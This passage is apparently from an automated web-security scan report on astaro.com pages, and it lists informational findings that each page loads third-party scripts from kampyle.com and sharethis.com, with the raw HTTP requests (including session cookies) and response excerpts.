<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.383. http://www.astaro.com/legal-statement previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/legal-statement

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /legal-statement HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:12:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 49346
Date: Tue, 01 Feb 2011 14:27:14 GMT
X-Varnish: 1753555590 1753542918
Age: 879
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.384. http://www.astaro.com/newsletter previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/newsletter

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

Response

18.385. http://www.astaro.com/products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /products HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:12:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 55920
Date: Tue, 01 Feb 2011 14:28:27 GMT
X-Varnish: 1753556446 1753543287
Age: 933
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.386. http://www.astaro.com/products/access-points previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/access-points

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /products/access-points HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:13:05 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 52889
Date: Tue, 01 Feb 2011 14:29:03 GMT
X-Varnish: 1753557221 1753543506
Age: 955
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.387. http://www.astaro.com/products/astaro-clients previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/astaro-clients

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /products/astaro-clients HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:13:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 45688
Date: Tue, 01 Feb 2011 14:29:03 GMT
X-Varnish: 1753557225 1753543528
Age: 948
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.388. http://www.astaro.com/products/astaro-command-center previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/astaro-command-center

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /products/astaro-command-center HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:13:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 54289
Date: Tue, 01 Feb 2011 14:29:05 GMT
X-Varnish: 1753557343 1753543563
Age: 932
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.389. http://www.astaro.com/products/astaro-red previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/astaro-red

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /products/astaro-red HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:03:32 GMT
ETag: "9b83fa78fb68a6c20a00db043503620a"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 48872
Date: Tue, 01 Feb 2011 14:28:54 GMT
X-Varnish: 1753556966 1753543476
Age: 950
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.390. http://www.astaro.com/products/astaro-security-gateway-software-appliance previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/astaro-security-gateway-software-appliance

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /products/astaro-security-gateway-software-appliance HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 13:39:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 52127
Date: Tue, 01 Feb 2011 14:28:41 GMT
X-Varnish: 1753556650 1753517954
Age: 2968
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.391. http://www.astaro.com/products/astaro-security-gateway-virtual-appliance-for-vmware previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/astaro-security-gateway-virtual-appliance-for-vmware

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /products/astaro-security-gateway-virtual-appliance-for-vmware HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 14:12:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 52931
Date: Tue, 01 Feb 2011 14:28:46 GMT
X-Varnish: 1753556797 1753543367
Age: 943
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
<script type="text/javascript" src="http://cf.kampyle.com/k_push.js"></script>
...[SNIP]...

18.392. http://www.astaro.com/products/astaro-smart-installer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.astaro.com
Path:	/products/astaro-smart-installer

Issue detail

The response dynamically includes the following scripts from other domains:

http://cf.kampyle.com/k_button.js
http://cf.kampyle.com/k_push.js
http://w.sharethis.com/button/sharethis.js

Request

GET /products/astaro-smart-installer HTTP/1.1
Host: www.astaro.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __unam=fa38af9-12dddaf19a7-13ff2714-5; has_js=1; k_visit=2; __utmz=112476180.1296504424.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; eZSESSIDen=3arq6oafh8mmgccr289cup83h1; s_sq=%5B%5BB%5D%5D; push_time_start=1296569531420; eZSESSIDch=3arq6oafh8mmgccr289cup83h1; eZSESSIDhk=3arq6oafh8mmgccr289cup83h1; s_cc=true; eZSESSIDau=3arq6oafh8mmgccr289cup83h1; eZSESSIDkr=3arq6oafh8mmgccr289cup83h1; SESS0cd45998089deffdc1539a43740a199d=7q0dud1mpbcvtrm9piqskj3qd1; eZSESSIDjp=3arq6oafh8mmgccr289cup83h1; __utma=1.546991621.1296493738.1296493738.1296493738.1; session_start_time=1296568531414; __utmc=1; __utmb=112476180.8.10.1296568533;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 01 Feb 2011 13:40:29 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 40654
Date: Tue, 01 Feb 2011 14:29:03 GMT
X-Varnish: 1753557255 1753518748
Age: 2913
Via: 1.1 varnish
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-int" lang="en-int" dir
...[SNIP]...
</script>

<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d451ce02-5adc-402d-8fc8-520bfb4f0007&type=website&buttonText=Share&post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga%2Cblinklist%2Ctwine%2Ctwackle%2Cdiigo%2Cfark%2Cfaves%2Cmister_wong%2Ccurrent%2Clivejournal%2Ckirtsy%2Cslashdot%2Coknotizie%2Ccare2%2Caim%2Cmeneame%2Csimpy%2Cblogmarks%2Cn4g%2Cbus_exchange%2Cfunp%2Csphinn%2Cfresqui%2Cdealsplus%2Ctypepad%2Cyigg&headerbg=%23FF9900&button=false"></script>
...[SNIP]...
</div -->
<script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
